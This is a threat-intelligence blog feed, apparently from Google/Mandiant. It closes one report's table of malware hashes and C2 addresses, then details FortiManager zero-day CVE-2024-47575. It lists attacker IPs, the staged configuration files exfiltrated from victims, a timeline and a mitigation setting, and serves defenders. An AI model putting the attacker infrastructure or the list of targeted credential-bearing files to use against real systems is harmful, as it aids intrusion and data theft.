16px;"> <p><span style="vertical-align: baseline;">206.71.149[.]194</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 used to resolve distribution URLs</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">185.169.107[.]44</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Open directory used for malware distribution</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">d36d303d2954cb4309d34c613747ce58</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Pronsis Loader dropper</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">b3cf993d918c2c61c7138b4b8a98b6bf</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">PURESTEALER</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">31cdae71f21e1fad7581b5f305a9d185</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">CRAXSRAT</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">aab597cdc5bc02f6c9d0d36ddeb7e624</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">CRAXSRAT w/ SUNSPINNER decoy </span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div></description><pubDate>Mon, 28 Oct 2024 13:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/threat-intelligence/russian-espionage-influence-ukrainian-military-recruits-anti-mobilization-narratives/</guid><category>Threat Intelligence</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Hybrid Russian Espionage and Influence Campaign Aims to Compromise Ukrainian Military Recruits and Deliver Anti-Mobilization Narratives</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/threat-intelligence/russian-espionage-influence-ukrainian-military-recruits-anti-mobilization-narratives/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Google Threat Intelligence Group </name><title></title><department></department><company></company></author></item><item><title>Investigating FortiManager Zero-Day Exploitation (CVE-2024-47575)</title><link>https://cloud.google.com/blog/topics/threat-intelligence/fortimanager-zero-day-exploitation-cve-2024-47575/</link><description><div class="block-paragraph_advanced"><p>Written by: Foti Castelan, Max Thauer, JP Glab, Gabby Roncone, Tufail Ahmed, Jared Wilson</p> <hr/></div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Summary</span></h2> <p><span style="vertical-align: baseline;">In October 2024, Mandiant collaborated with Fortinet to investigate the mass exploitation of FortiManager appliances across 50+ potentially compromised FortiManager devices in various industries. The vulnerability, </span><a href="https://www.cve.org/CVERecord?id=CVE-2024-47575" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">CVE-2024-47575</span></a><span style="vertical-align: baseline;"> / </span><a href="https://www.fortiguard.com/psirt/FG-IR-24-423" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">FG-IR-24-423</span></a><span style="vertical-align: baseline;">, allows a threat actor to use an unauthorized, threat actor-controlled FortiManager device to execute arbitrary code or commands against vulnerable FortiManager devices. </span></p> <p><span style="vertical-align: baseline;">Mandiant observed a new threat cluster we now track as UNC5820 exploiting the FortiManager vulnerability as early as June 27, 2024. UNC5820 staged and exfiltrated the configuration data of the FortiGate devices managed by the exploited FortiManager. This data contains detailed configuration information of the managed appliances as well as the users and their FortiOS256-hashed passwords. This data could be used by UNC5820 to further compromise the FortiManager, move laterally to the managed Fortinet devices, and ultimately target the enterprise environment.</span></p> <p><span style="vertical-align: baseline;">At this time, the data sources analyzed by Mandiant did not record the specific requests that the threat actor used to leverage the FortiManager vulnerability. Additionally, at this stage of our investigations there is no evidence that UNC5820 leveraged the obtained configuration data to move laterally and further compromise the environment. As a result, at the time of publishing, we lack sufficient data to assess actor motivation or location. As additional information becomes available through our investigations, Mandiant will update this blog’s attribution assessment.</span></p> <p><span style="vertical-align: baseline;">Organizations that may have their FortiManager exposed to the internet should conduct a forensic investigation immediately.</span></p> <h2><span style="vertical-align: baseline;">Exploitation Details</span></h2> <p><span style="vertical-align: baseline;">Mandiant’s earliest observed exploitation attempt occurred on June 27, 2024. On that day, multiple FortiManager devices received inbound connections from the IP address 45[.]32[.]41[.]202 on the default port TCP/541. At approximately the same time, the file system recorded the staging of various Fortinet configuration files in a Gzip-compressed archive named /tmp/.tm. This archive contained the files and folders as listed in Table 1.</span></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; margin-left: auto; margin-right: auto;"><colgroup><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Filename</strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Description</strong></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">/var/dm/RCS</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Folder containing configuration files of managed FortiGate devices</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">/var/dm/RCS/revinfo.db</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Database containing additional information of the managed FortiGate devices</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">/var/fds/data/devices.txt</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Contains a list of FortiGate serials and their corresponding IP addresses</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">/var/pm2/global.db</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Global database that contains object configurations, policy packages, and header and footer sensor configuration for IPS</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">/var/old_fmversion</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Contains current FortiManager version, build, and branch information</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; margin-top: 8px; width: 100%; font-style: italic;">Table 1: Content of /tmp/.tm</span></p> </div></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">On Sept. 23, 2024, Mandiant observed a second exploitation attempt with the same indicators. In both exploitation events, outbound network traffic occurred shortly after the archive creation. The amount of bytes sent to the respective destination IP addresses are slightly larger than the size of the archive. Table 2 lists the details of this activity.</span></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; margin-left: auto; margin-right: auto;"><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Timestamp</strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Description</strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Size</strong></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">2024-06-27 12:44:04</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">/tmp/.tm (File creation)</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Unknown</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">2024-06-27 12:44:11</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Outbound traffic to 195[.]85[.]114[.]78:443</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">1,819,425 bytes</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">2024-09-23 11:31:12</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">/tmp/.tm (File modification)</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">1,772,650 bytes</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">2024-09-23 11:31:19</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Outbound traffic to 104[.]238[.]141[.]143:443</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">1,822,968 bytes</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 2: Correlation of staged configuration data and outbound traffic of the two exploitation attempts</span></div></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">During the second exploitation attempt, the threat actor’s device was registered to the targeted FortiManager. Figure 1 lists the unauthorized FortiManager in the Global Objects database along with the timestamp when it was added.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/fortinet-zero-day-fig1.max-1000x1000.png" alt="Threat actor’s device added to Global Objects database"> </a> <figcaption class="article-image__caption "><p data-block-key="snwpm">Figure 1: Threat actor’s device added to Global Objects database</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Once the threat actor successfully exploited the FortiManager, their unknown Fortinet device appeared in the FortiManager console.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/fortinet-zero-day-fig2.max-1000x1000.png" alt="Unauthorized device listed in FortiManager console"> </a> <figcaption class="article-image__caption "><p data-block-key="1b2uy">Figure 2: Unauthorized device listed in FortiManager console</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">An additional indicator of successful exploitation is the addition of the unauthorized device serial number “FMG-VMTM23017412” and its corresponding IP address 45[.]32[.]41[.]202 to the file </span><span style="font-style: italic; vertical-align: baseline;">/fds/data/unreg_devices.txt</span><span style="vertical-align: baseline;">. Figure 3 lists the content of this file.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>FMG-VMTM23017412|45.32.41.202</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 3: Content of /fds/data/unreg_devices.txt</span></p></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The files </span><span style="font-style: italic; vertical-align: baseline;">/fds/data/subs.dat</span><span style="vertical-align: baseline;"> and </span><span style="font-style: italic; vertical-align: baseline;">/fds/data/subs.dat.tmp </span><span style="vertical-align: baseline;">contain additional indicators of the exploitation that include an associated disposable email address and a company name as listed in Figure 4.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>SerialNumber=FMG-VMTM23017412|AccountID= 0qsc137p@justdefinition.com|Company=Purity Supreme|UserID=1756868</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 4: Content of /fds/data/subs.dat</span></p></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Mandiant scraped the FortiManager’s memory image for additional artifacts of threat actor activity and detected a JSON blob containing the keywords “FMG-VMTM23017412” and “45[.]32[.]41[.]202”. This JSON blob also included a “first_tunnel_up” key, which contained the epoch time of 1726999303 as its value. This timestamp translates to 2024-09-22 10:01:43 UTC.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/fortinet-zero-day-fig5a.max-1000x1000.png" alt="Tunnel up artifacts"> </a> <figcaption class="article-image__caption "><p data-block-key="7z149">Figure 5: Tunnel up artifacts</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Lack of Follow-On Malicious Activity</span></h2> <p><span style="vertical-align: baseline;">Mandiant reviewed the rootfs.gz, which is an initramfs (RAM disk) for the device that gets mounted to /bin. We did not find any malicious files created or modified during the time frame of exploitation activity. </span></p> <p><span style="vertical-align: baseline;">Google Cloud notified affected customers who showed similar activity in their environments. Additionally, Google Threat Intelligence ran retrohunts while developing detections for this activity, and manually escalated Pre-Release Detection Rule alerts to affected SecOps customers to assist with detecting exploit attempts of Fortinet devices. </span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/fortinet-zero-day-fig6.max-1000x1000.png" alt="Pre-Release Detection Rule - Suspected Zero Day Exploitation of Fortinet Device"> </a> <figcaption class="article-image__caption "><p data-block-key="rgqr5">Figure 6: Pre-Release Detection Rule — Suspected Zero Day Exploitation of Fortinet Device</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">In addition to collaborating with Mandiant, Fortinet proactively sent advance communications to </span><span style="vertical-align: baseline;">its customers as an early warning on their advisory to enable customers to strengthen their </span><span style="vertical-align: baseline;">security posture prior to broad public disclosure.</span></p> <h2><span style="vertical-align: baseline;">Timeline of Threat Actor Activity</span></h2></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; margin-left: auto; margin-right: auto;"><colgroup><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Timestamp</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Event</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">2024-06-27 12:44:04</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Inbound network connection from 45[.]32[.]41[.]202.<strong> </strong></span><span style="vertical-align: baseline;">File creation: </span><span style="font-style: italic; vertical-align: baseline;">/tmp/.tm</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">2024-06-27 12:44:07</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Outbound network connection to 45[.]32[.]41[.]202 on port 443</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">2024-06-27 12:</span><span style="vertical-align: baseline;">44</span><span style="vertical-align: baseline;">:11</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Outbound network connection to 195[.]85[.]114[.]78 on port 443. The bytes sent </span><span style="vertical-align: baseline;">are approximately</span><span style="vertical-align: baseline;"> equal to the size of </span><span style="font-style: italic; vertical-align: baseline;">/tmp/.tm</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">2024-09-22 10:01:47</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Inbound network connection from 45[.]32[.]41[.]202</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">2024-09-22 10:01:50</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Outbound network connections to 158[.]247[.]199[.]37:443 and 45[.]32[.]41[.]202:443. The connections to 158[.]247[.]199[.]37 were denied</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">2024-09-22 10:02:21</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">String indicating exploitation in </span><span style="font-style: italic; vertical-align: baseline;">/log/locallog/elog</span><span style="font-style: italic; vertical-align: baseline;"><strong> </strong></span><span style="font-style: italic; vertical-align: baseline;">msg="Unregistered device localhost add succeeded"</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">2024-09-22 10:02:55</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">File modified: </span><span style="font-style: italic; vertical-align: baseline;">/fds/data/unreg_devices.txt<strong> </strong></span><span style="vertical-align: baseline;">Contents: “FMG-VMTM23017412|45.32.41.202”</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">2024-09-22 10:07:36</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">String indicating exploitation in </span><span style="font-style: italic; vertical-align: baseline;">/log/locallog/elog</span><span style="font-style: italic; vertical-align: baseline;"><strong> </strong></span><span style="font-style: italic; vertical-align: baseline;">changes="Edited device settings (SN FMG-VMTM23017412)"</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">2024-09-23 11:31:12</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Inbound network connection to destination port 541 from 45[.]32[.]41[.]202<strong> </strong></span><span style="vertical-align: baseline;">File modified: </span><span style="font-style: italic; vertical-align: baseline;">/tmp/.tm</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">2024-09-23 11:31:16</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Outbound network connection to 104[.]238[.]141[.]143. The bytes sent </span><span style="vertical-align: baseline;">are approximately</span><span style="vertical-align: baseline;"> equal to the size of </span><span style="font-style: italic; vertical-align: baseline;">/tmp/.tm</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <section class="Wy08Ac nRhiJb-qJTHM-OWXEXe-hJDwNd nRhiJb-DbgRPb-II5mzb-cGMI2b"> <div align="left"> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 3: Timeline of activity</span></p> </div> </section> </div></div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Mitigation Strategies / Workaround</span></h2> <ol> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Limit access to FortiManager admin portal for only approved internal IP addresses.</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Only allow permitted FortiGate addresses to communicate with FortiManager.</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Deny unknown FortiGate devices from being associated with FortiManager.</span></p> </li> </ol> <p><span style="vertical-align: baseline;">Available 7.2.5, 7.0.12, 7.4.3 and later (not functional workaround on 7.6.0).</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>config system global set fgfm-deny-unknown enable end</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 7: Configuration to deny unknown devices</span></p></div> <div 